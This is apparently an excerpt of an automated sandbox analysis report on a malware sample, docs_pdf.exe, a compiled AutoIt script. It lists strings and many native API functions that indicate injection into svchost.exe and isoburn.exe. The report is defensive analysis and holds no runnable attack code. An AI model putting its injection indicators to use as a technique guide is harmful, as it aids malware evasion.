            Source: docs_pdf.exe, 00000000.00000000.2088726475.00000000001A5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a35b5956-7
            Source: docs_pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f695eb0e-8
            Source: docs_pdf.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3212d1d6-5
            Source: initial sampleStatic PE information: Filename: docs_pdf.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042BBA3 NtClose,2_2_0042BBA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B60 NtClose,LdrInitializeThunk,2_2_03772B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03772DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,2_2_037735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774340 NtSetContextThread,2_2_03774340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774650 NtSuspendThread,2_2_03774650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BF0 NtAllocateVirtualMemory,2_2_03772BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BE0 NtQueryValueKey,2_2_03772BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BA0 NtEnumerateValueKey,2_2_03772BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B80 NtQueryInformationFile,2_2_03772B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AF0 NtWriteFile,2_2_03772AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AD0 NtReadFile,2_2_03772AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AB0 NtWaitForSingleObject,2_2_03772AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F60 NtCreateProcessEx,2_2_03772F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F30 NtCreateSection,2_2_03772F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FE0 NtCreateFile,2_2_03772FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FB0 NtResumeThread,2_2_03772FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FA0 NtQuerySection,2_2_03772FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F90 NtProtectVirtualMemory,2_2_03772F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E30 NtWriteVirtualMemory,2_2_03772E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EE0 NtQueueApcThread,2_2_03772EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EA0 NtAdjustPrivilegesToken,2_2_03772EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E80 NtReadVirtualMemory,2_2_03772E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D30 NtUnmapViewOfSection,2_2_03772D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D10 NtMapViewOfSection,2_2_03772D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D00 NtSetInformationFile,2_2_03772D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DD0 NtDelayExecution,2_2_03772DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DB0 NtEnumerateKey,2_2_03772DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C70 NtFreeVirtualMemory,2_2_03772C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C60 NtCreateKey,2_2_03772C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C00 NtQueryInformationProcess,2_2_03772C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CF0 NtOpenProcess,2_2_03772CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CC0 NtQueryVirtualMemory,2_2_03772CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CA0 NtQueryInformationToken,2_2_03772CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773010 NtOpenDirectoryObject,2_2_03773010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773090 NtSetValueKey,2_2_03773090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037739B0 NtGetContextThread,2_2_037739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D70 NtOpenThread,2_2_03773D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D10 NtOpenProcessToken,2_2_03773D10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A4650 NtSuspendThread,LdrInitializeThunk,5_2_048A4650
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A4340 NtSetContextThread,LdrInitializeThunk,5_2_048A4340
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_048A2CA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2C60 NtCreateKey,LdrInitializeThunk,5_2_048A2C60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_048A2C70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2DD0 NtDelayExecution,LdrInitializeThunk,5_2_048A2DD0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_048A2DF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_048A2D10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_048A2D30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_048A2E80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_048A2EE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2FB0 NtResumeThread,LdrInitializeThunk,5_2_048A2FB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2FE0 NtCreateFile,LdrInitializeThunk,5_2_048A2FE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2F30 NtCreateSection,LdrInitializeThunk,5_2_048A2F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2AD0 NtReadFile,LdrInitializeThunk,5_2_048A2AD0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2AF0 NtWriteFile,LdrInitializeThunk,5_2_048A2AF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_048A2BA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_048A2BE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_048A2BF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2B60 NtClose,LdrInitializeThunk,5_2_048A2B60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A35C0 NtCreateMutant,LdrInitializeThunk,5_2_048A35C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A39B0 NtGetContextThread,LdrInitializeThunk,5_2_048A39B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2CC0 NtQueryVirtualMemory,5_2_048A2CC0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2CF0 NtOpenProcess,5_2_048A2CF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2C00 NtQueryInformationProcess,5_2_048A2C00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2DB0 NtEnumerateKey,5_2_048A2DB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2D00 NtSetInformationFile,5_2_048A2D00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2EA0 NtAdjustPrivilegesToken,5_2_048A2EA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2E30 NtWriteVirtualMemory,5_2_048A2E30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2F90 NtProtectVirtualMemory,5_2_048A2F90
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2FA0 NtQuerySection,5_2_048A2FA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2F60 NtCreateProcessEx,5_2_048A2F60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2AB0 NtWaitForSingleObject,5_2_048A2AB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A2B80 NtQueryInformationFile,5_2_048A2B80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A3090 NtSetValueKey,5_2_048A3090
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A3010 NtOpenDirectoryObject,5_2_048A3010
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A3D10 NtOpenProcessToken,5_2_048A3D10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_048A3D70 NtOpenThread,5_2_048A3D70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_008280F0 NtClose,5_2_008280F0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_00828050 NtDeleteFile,5_2_00828050
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_00828250 NtAllocateVirtualMemory,5_2_00828250
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_00827E00 NtCreateFile,5_2_00827E00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_00827F60 NtReadFile,5_2_00827F60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 5_2_0468D3DC NtSetContextThread,5_2_0468D3DC
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00154021: CreateFileW,DeviceIoControl,CloseHandle,0_2_00154021
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00148858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00148858
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0015545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0015545F
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_000FE8000_2_000FE800
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0011DBB50_2_0011DBB5
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0017804A0_2_0017804A
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_000FE0600_2_000FE060
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001041400_2_00104140
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001124050_2_00112405
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001265220_2_00126522
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0012267E0_2_0012267E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_001706650_2_00170665
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0011283A
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00106843
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_001289DF
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00108A0E
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00126A94
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00170AE2
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00158B13
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0014EB07
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0011CD61
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00127006
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0010710E
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00103190
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_000F1287
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_001133C7
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0011F419
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00105680
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_001116C4
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_001178D3
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_001058C0
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00111BB8
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00129D05
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_000FFE40
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00111FD0
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0011BFE6
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_036E35E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042E053
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040282A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402830
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004010C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00410893
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004010BE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E913
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004029F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004033FF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00404C54
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403400
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402CA4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402CB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00410673
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416FDF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416FE3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038003E6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C02C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C8158
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038001AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03730100
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F81CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F41A2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03740770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03764750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375C6E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03800591
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03740535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F2446
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E4420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037EE4F6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FAB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F6BD7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03756962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0380A9A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374A840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03742840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376E8F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037268B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B4F40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03760F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E2F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03782F28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374CFE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03732FC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BEFA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03740E59
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FEE26
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FEEDB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03752E90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FCE93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DCD1F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374AD00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373ADE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03758DBF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03740C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03730CF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E0CB5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372D34C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F132D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0378739A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E12ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375B2C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037452A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372F172
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0377516C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374B1B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0380B16B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F70E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FF0E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037EF0CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037470C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FF7B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03785630
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F16CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F7571
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038095C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DD5B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03731460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FF43F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FFB76
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B5BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0377DBF9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375FB80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B3A6C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FFA49
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F7A46
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037EDAC6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DDAAC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03785AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E1AA3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03749950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375B950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D5910
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AD800
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037438E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FFF09
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03703FD2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03703FD5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FFFB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03741F92
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03749EB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F7D73
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F1D5A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03743D40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375FDC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B9C32
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FFCF2
Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Code function: 4_2_03A2DBB8
Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Code function: 4_2_03A34304
Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Code function: 4_2_03A34308
Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Code function: 4_2_03A4B378
Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Code function: 4_2_03A2D998
Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Code function: 4_2_03A21F79
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0491E4F6
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04914420
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04922446
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04930591
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04870535
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0488C6E0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0486C7C0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04894750
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04870770
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04902000
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_049241A2
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_049301AA
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_049281CC
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04860100
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0490A118
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048F8158
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048F02C0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04910274
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_049303E6
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0487E3F0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0492A352
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04910CB5
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04860CF2
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04870C00
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04888DBF
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0486ADE0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0487AD00
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0490CD1F
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0492CE93
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04882E90
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0492EEDB
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0492EE26
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04870E59
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048EEFA0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04862FC8
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0487CFE0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04912F30
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048B2F28
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04890F30
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048E4F40
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048568B8
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0489E8F0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04872840
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0487A840
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048729A0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0493A9A6
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04886962
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0486EA80
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04926BD7
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0492AB40
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0492F43F
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04861460
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0490D5B0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_049395C3
